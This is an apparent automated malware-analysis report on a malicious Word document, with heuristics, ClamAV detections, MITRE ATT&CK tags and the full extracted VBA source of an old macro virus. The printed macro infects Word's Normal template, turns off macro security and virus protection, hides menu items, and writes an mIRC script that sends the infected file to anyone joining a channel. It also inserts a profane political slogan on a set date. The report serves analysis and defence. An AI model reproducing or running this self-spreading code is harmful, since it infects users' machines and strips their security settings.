MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including AutoOpen and AutoClose functions, indicating malicious intent. The AutoExec subroutine attempts to check for and potentially interact with the mIRC client, creating a script file 'c:\mirc\script.ini' that includes logic to send a file named 'c:\mirc\download\ReadMe.doc' via DCC to a connected user. This suggests the macro's primary purpose is to download and distribute a secondary payload.
Heuristics 4
-
ClamAV: Doc.Trojan.Class-44 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-44
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2738 bytes |
SHA-256: 7ce7c93257bcdcc248dd5bb733d877f6837b55c7c1df3b0ba5d840939cd63443 |
|||
|
Detection
ClamAV:
Doc.Trojan.Intruded-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.shadow"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "EDSA4"
Sub AutoExec()
On Error Resume Next
Call infest
With Dialogs(wdDialogFileSummaryInfo)
.Author = "pickpacket"
.Keywords = ""
.Execute
End With
Exists = Dir("c:\mirc\mirc32.exe")
If Exists = "" Then
Exit Sub
Else
dropped = Dir("c:\mirc\download\ReadMe.doc")
If dropped = "" Then ActiveDocument.SaveAs "c:\mirc\download\ReadMe.doc"
Kill "c:\mirc\script.ini"
Open "c:\mirc\script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\ReadMe.doc }"
Print #1, "n1=on 1:CONNECT: {"
Print #1, "n2= /clear"
Print #1, "n3= /motd"
Print #1, "n4= }"
Close #1
End If
End Sub
Sub filePrint()
On Error Resume Next
If Day(Now) = 26 And Month(Now) = 10 Then
Selection.InsertAfter "With the new government rises the ash of the former administrations" & vbCr & "Fuck the Philippine government what we want is EDSA4!!"
Selection.InsertAfter vbCr & "by pickpacket"
End If
Dialogs(wdDialogFilePrint).Show
End Sub
Sub AutoClose()
On Error Resume Next
Call infest
End Sub
Sub FileSave()
On Error Resume Next
Dialogs(wdDialogFileSave).Show
Call infest
End Sub
Sub infest()
On Error Resume Next
Call stealth
Set normtemp = NormalTemplate.VBProject.VBComponents
Set actvdoc = ActiveDocument.VBProject.VBComponents
Application.VBE.ActiveVBProject.VBComponents("EDSA4").export "c:\ppacket.vxd"
If normtemp.Item("EDSA4").Name <> "EDSA4" Then
normtemp.Remove normtemp(2)
normtemp.import "c:\ppacket.vxd"
NormalTemplate.Save
ElseIf actvdoc.Item("EDSA4").Name <> "EDSA4" Then
actvdoc.Remove actvdoc(2)
actvdoc.import "c:\ppacket.vxd"
End If
Kill "c:\ppacket.vxd"
End Sub
Sub stealth()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Delete
CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
CommandBars("Tools").Controls("Customize...").Delete
CommandBars("Format").Controls("Style...").Delete
CommandBars("View").Controls("Toolbars").Delete
With Options
.ConfirmConversions = False
.SaveNormalPrompt = False
.VirusProtection = False
End With
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
Application.DisplayStatusBar = False
ActiveDocument.ReadOnlyRecommended = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.